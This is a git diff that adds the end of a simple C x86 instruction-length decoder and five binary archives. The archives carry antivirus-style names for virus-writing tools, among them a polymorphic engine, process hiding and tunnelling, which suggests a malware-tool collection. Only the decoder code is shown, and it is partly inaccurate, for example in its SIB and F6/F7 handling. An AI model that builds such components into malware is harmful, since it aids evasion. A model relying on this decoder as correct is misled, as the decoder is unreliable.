+ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy, /* D8..DF */
+ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* E0..E7 */
+ModRMn+Imm32,ModRMn+Imm32,ModRM /*EA Unknown */,ModRMn+Imm08,ModRMn,ModRMn,ModRMn,ModRMn, /* E8..EF */
+Prefix,ModRMn,Prefix,Prefix,ModRMn,ModRMn,ModRMy+Imm08,ModRMy+Imm32, /* F0..F7 */
+ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMy,ModRMy /* F8..FF */
+};
+
+int main()
+{
+
+unsigned char *ptr,Mod;
+ptr = Array;
+int OperandSize = 4,OpcodeSize = 0,Displacement = 4;
+
+DecodePrefixes:
+               
+if(ModRMTable[*ptr] == Prefix) { 
+if (*ptr == 0x66) { OpcodeSize += 1; OperandSize -= 2; } else { OpcodeSize += 1; }
+ptr++;
+goto DecodePrefixes;
+}
+
+OpcodeSize += 1; /* because of the opcode */
+
+if (ModRMTable[*ptr] == Imm08+ModRMy || ModRMTable[*ptr] == Imm08 ) { OpcodeSize += 1; } /*is there a 8 bit Imm */
+if (ModRMTable[*ptr] == Imm32+ModRMy || ModRMTable[*ptr] == Imm32 ) { OpcodeSize += OperandSize; } /* is there a 16 or 32 bit imm */
+if (ModRMTable[*ptr] == ModRMy || ModRMTable[*ptr] == ModRMy+Imm08 || ModRMTable[*ptr] == ModRMy+Imm32) { /* is there a ModR/M Byte */
+ OpcodeSize += 1; ptr++; /*read the ModR/M Byte */  goto DecodeMod; }
+  else { printf ("The Opcode Size Is: %d\n",OpcodeSize);  return 0; }
+
+    /*Decode ModR/M Byte */
+DecodeMod:
+Mod = *ptr;
+if((Mod >= 0x00 && Mod <= 0x3F) || (Mod >= 0xC0 && Mod <= 0xFF)) {  Displacement -= 4;  }  
+if(Mod >= 0x40 && Mod <= 0x7F) { Displacement -= 3; }
+OpcodeSize += Displacement;
+
+if((Mod%0x10 == 4) || (Mod%0x10 == 0x0C)) {  OpcodeSize += 1;} /* does it have SIB ? */
+if(Mod <= 0x3D) { if((Mod%0x10 == 0x05) || (Mod%0x10 == 0x0D)){ OpcodeSize += 4; } }/* is it direct addresation? */
+
+
+printf ("The Opcode Size Is: %d\n",OpcodeSize);
+  
+  return 0;
+}
diff --git a/libs/VirTool.Win32.Disassembler.Xde.7z b/libs/VirTool.Win32.Disassembler.Xde.7z
new file mode 100644
index 00000000..d54f0b92
Binary files /dev/null and b/libs/VirTool.Win32.Disassembler.Xde.7z differ
diff --git a/libs/VirTool.Win32.Nmpe.7z b/libs/VirTool.Win32.Nmpe.7z
new file mode 100644
index 00000000..3d313d75
Binary files /dev/null and b/libs/VirTool.Win32.Nmpe.7z differ
diff --git a/libs/VirTool.Win32.Poly.Prcg.7z b/libs/VirTool.Win32.Poly.Prcg.7z
new file mode 100644
index 00000000..93667704
Binary files /dev/null and b/libs/VirTool.Win32.Poly.Prcg.7z differ
diff --git a/libs/VirTool.Win32.ProcessHide.7z b/libs/VirTool.Win32.ProcessHide.7z
new file mode 100644
index 00000000..5115b064
Binary files /dev/null and b/libs/VirTool.Win32.ProcessHide.7z differ
diff --git a/libs/VirTool.Win32.Tunnel.7z b/libs/VirTool.Win32.Tunnel.7z
new file mode 100644
index 00000000..e5d9d2e0
Binary files /dev/null and b/libs/VirTool.Win32.Tunnel.7z differ